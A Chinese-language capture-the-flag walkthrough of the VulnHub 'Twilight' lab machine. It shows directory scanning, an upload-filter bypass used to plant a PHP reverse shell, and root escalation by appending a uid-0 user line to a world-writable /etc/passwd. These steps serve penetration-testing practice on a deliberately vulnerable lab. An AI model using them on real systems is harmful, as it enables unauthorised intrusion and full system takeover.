TWILIGHT靶场详解

TWILIGHT靶场详解

下载地址:https://download.vulnhub.com/sunset/twilight.7z

这是一个比较简单的靶场,拿到IP后我们扫描发现开启了超级多的端口

其实这些端口一点用都没有,在我的方法中

但是也有不同的方法可以拿权限,就需要这些开放的服务了

TWILIGHT靶场详解_第1张图片

扫描目录时候我们发现有一个文件上传的目录,只能上传图片。

dirsearch -u http://192.168.102.199/gallery/

TWILIGHT靶场详解_第2张图片

但是我们抓包的时候可以上传PHP文件,然后修改成图片类型。

TWILIGHT靶场详解_第3张图片

这样就能上传一个反弹shell

TWILIGHT靶场详解_第4张图片

然后我有扫描了一下上传后文件所在的目录,这里用了一个大字典扫描,小字典扫描不到。

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -u http://192.168.102.199/gallery/    

image-20230731190908704

点击我们上传的php文件,下面那个也是我上传的。

TWILIGHT靶场详解_第5张图片

这样我们kali就拿到了一个webshell

TWILIGHT靶场详解_第6张图片

利用python3美化一下命令行,同时也提高了权限。

python3 -c "import pty;pty.spawn('/bin/bash')"

查看passwd文件的时候发现这个文件是所有人可读可写的。

我们就可以利用这个漏洞,插入一个新用户。

image-20230731191337612

利用下面命令我们就可以插入一个新的有root权限的用户,密码需要加密,我们用openssl工具可以加密对应的账号密码。

echo 'tang:$1$tang$pBxlp5xZvZzeAXxc4Ki/v0:0:0:root:/root:/bin/bash' >> /etc/passwd

image-20230731191604691

su tang登陆新用户发现就是root权限了。

TWILIGHT靶场详解_第7张图片

你可能感兴趣的:(打靶机系列,linux,网络安全,web安全)